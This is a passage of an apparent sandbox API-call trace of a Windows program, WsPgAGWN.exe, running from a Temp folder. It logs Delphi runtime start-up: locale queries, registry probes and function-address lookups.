cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0174.907] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0174.907] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0174.907] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0174.907] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13f80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0174.907] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0174.907] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x30 [0174.908] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0174.908] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0174.908] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0174.908] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0174.908] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0174.908] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0174.908] GetThreadLocale () returned 0x409 [0174.908] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0174.908] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0174.908] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0174.908] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0174.908] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0174.908] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2c4448 [0174.908] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0174.908] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0174.909] GetLastError () returned 0x7a [0174.909] GetLogicalProcessorInformation (in: Buffer=0x13e99d0, ReturnedLength=0x12fab0 | out: Buffer=0x13e99d0, ReturnedLength=0x12fab0) returned 1 [0174.909] GetCurrentThreadId () returned 0x728 [0174.909] GetCurrentThreadId () returned 0x728 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0174.909] GetThreadLocale () returned 0x409 [0174.909] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0174.909] GetThreadLocale () returned 0x409 [0174.909] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0174.909] GetCurrentThreadId () returned 0x728 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0174.911] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0174.911] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0174.911] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0174.911] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0174.911] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0174.911] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0174.911] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0174.912] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0174.912] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0174.912] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0174.912] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=23170164095) returned 1 [0174.912] GetTickCount () returned 0x32db4 [0174.913] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xe, wMilliseconds=0x2f6)) [0174.913] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xe, wMilliseconds=0x2f6)) [0174.913] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=23170181342) returned 1 [0174.913] GetTickCount () returned 0x32db4 [0174.913] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xe, wMilliseconds=0x2f6)) [0174.913] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xe, wMilliseconds=0x2f6)) [0174.913] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13f82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0174.913] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x13e288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0174.913] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0174.913] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13f82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0174.913] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13f82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0174.913] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0174.913] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0174.914] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x13ff48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0174.914] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0174.914] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0174.914] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0174.914] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0174.914] GetThreadLocale () returned 0x409 [0174.914] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0174.914] GetCurrentThreadId () returned 0x728 [0174.914] GetCurrentThreadId () returned 0x728 [0174.914] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0174.914] GetThreadLocale () returned 0x409 [0174.914] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0174.914] GetThreadLocale () returned 0x409 [0174.914] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0174.914] GetCurrentThreadId () returned 0x728 [0174.914] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0174.914] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0174.914] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0174.914] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, 